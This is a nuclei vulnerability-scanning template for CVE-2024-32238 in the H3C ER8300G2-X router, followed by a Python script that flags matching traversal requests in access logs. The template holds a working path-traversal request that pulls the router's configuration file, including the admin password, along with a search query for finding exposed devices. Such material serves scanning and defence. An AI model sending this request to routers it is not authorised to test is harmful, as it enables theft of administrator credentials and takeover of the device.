Vulnerability description
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
id: CVE-2024-32238

info:
  name: H3C ER8300G2-X - Password Disclosure
  author: s4e-io,adeljck
  severity: critical
  description: |
    H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
  reference:
    - https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/asdfjkl11/CVE-2024-32238/issues/1
    - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
    - https://github.com/20142995/nuclei-templates
    - https://github.com/FuBoLuSec/CVE-2024-32238
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32238
    cwe-id: CWE-522
    epss-score: 0.90699
    epss-percentile: 0.99591
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="icg_helpScript.js"
  tags: cve,cve2024,h3c,router,info-leak,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /userLogin.asp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: module_name
        part: body
        internal: true
        group: 1
        regex:
          - "<title>([A-Za-z0-9-]+)系统管理</title>"

  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "application/x-unknown")'
          - 'contains_all(body, "admpwd=", "auxauthmode=")'
          - 'contains(server, "H3C-Miniware")'
        condition: and
# digest: 4a0a0047304502200e488524ed1e091bdd0eb018546662b565ba5c3aafbdc90191beca6f188e0315022100dcd210d35a6fbaadd9b3cfdc39cd66c4f88d5010fae0a232cb234a307a82f664:922c64590222798bb761d5b6d8e72950
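
A defender-side check for the request shape in the template's second `http` step, added here as an example and not part of the template or the nuclei-templates project: it scans access logs for `/userLogin.asp` paths that traverse to a `.cfg` file. It assumes combined-log-format lines from a reverse proxy or gateway in front of the management interface that records the raw request target; the function names, sample lines and the `EXAMPLE-MODEL` file name are constructed.

```python
import re
from urllib.parse import unquote

# Combined-log-format entry: client ... "METHOD target HTTP/x.y" status
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def is_cfg_probe(target: str) -> bool:
    """True for a path that starts at /userLogin.asp, contains a '..' segment
    and ends in .cfg, the shape of the template's second request."""
    path = target.split("?", 1)[0]
    for _ in range(2):  # undo single and double percent-encoding
        path = unquote(path)
    path = path.replace("\\", "/").lower()
    return (path.startswith("/userlogin.asp/")
            and ".." in path.split("/")
            and path.endswith(".cfg"))

def find_cfg_probes(lines):
    """Return one record per matching request. Status 200 means the device
    answered, so the management password should be treated as exposed."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_cfg_probe(m["target"]):
            hits.append({
                "client": m["client"],
                "target": m["target"],
                "status": int(m["status"]),
                "likely_disclosed": m["status"] == "200",
            })
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder model name).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2024:10:01:02 +0000] "GET /userLogin.asp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/May/2024:10:01:03 +0000] '
    '"GET /userLogin.asp/../actionpolicy_status/../EXAMPLE-MODEL.cfg HTTP/1.1" 200 20480',
    '198.51.100.9 - - [12/May/2024:10:07:41 +0000] '
    '"GET /userLogin.asp/%2e%2e/actionpolicy_status/%2E%2E/EXAMPLE-MODEL.cfg HTTP/1.1" 404 0',
    '192.0.2.10 - - [12/May/2024:10:09:15 +0000] "GET /images/logo.cfg HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_cfg_probes(SAMPLE_LOG):
        print(hit)
```

Any hit with `likely_disclosed` set warrants rotating the management password and restricting access to the management interface, since the matchers above show the returned file carries `admpwd=`.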